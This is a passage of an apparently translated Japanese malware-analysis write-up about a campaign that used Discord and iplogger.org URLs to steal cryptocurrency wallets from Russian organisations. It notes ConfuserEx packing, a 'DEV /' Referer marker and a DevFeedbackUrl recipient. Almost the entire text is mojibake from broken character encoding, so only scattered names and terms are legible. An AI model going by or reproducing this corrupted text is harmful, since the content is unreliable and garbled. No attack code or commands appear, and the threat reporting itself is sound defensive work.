ããã°ã©ã ãéçºäžã§ããããšã瀺ãå¥ã®å åããããŸãã ãã€ã㪠ãã¡ã€ã«ã«ã¯ XNUMX ã€ã® iplogger.org URL ãå«ãŸããŠãããããŒã¿ãæœåºããããšãã«äž¡æ¹ãšãã¯ãšãªãããŸãã ãããã® URL ã®ãããããžã®ãªã¯ãšã¹ãã§ã¯ãReferer ãã£ãŒã«ãã®å€ã®åã«ãDEV /ããä»ããŸãã ConfuserEx ã䜿çšããŠããã±ãŒãžåãããŠããªãããŒãžã§ã³ãèŠã€ãããŸããããã® URL ã®åä¿¡è 㯠DevFeedbackUrl ãšããååã§ãã ç°å¢å€æ°åã«åºã¥ããŠããªãã¬ãŒã¿ãŒã¯æ£èŠãµãŒãã¹ Discord ãšãã® Web ååã·ã¹ãã ã䜿çšããŠãæå·é貚ãŠã©ã¬ãããçãããšãèšç»ããŠãããšèããããŸãã
ãŸãšã
ãã®ãã£ã³ããŒã³ã¯ããµã€ããŒæ»æã«ãããæ£èŠã®åºåãµãŒãã¹ã®äœ¿çšã®äžäŸã§ãã ãã®èšç»ã¯ãã·ã¢ã®çµç¹ãæšçã«ããŠããŸããããã·ã¢ä»¥å€ã®ãµãŒãã¹ã䜿çšãããã®ãããªæ»æããã£ãŠãé©ããªãã§ãããã 䟵害ãé¿ããããã«ããŠãŒã¶ãŒã¯ããŠã³ããŒããããœãããŠã§ã¢ã®ãœãŒã¹ã®è©å€ã«èªä¿¡ãââæã£ãŠããå¿ èŠããããŸãã
䟵害ã®å
åãš MITRE ATT&CK å±æ§ã®å®å
šãªãªã¹ãã¯ã次ã®å Žæã§å
¥æã§ããŸãã
åºæïŒ habr.com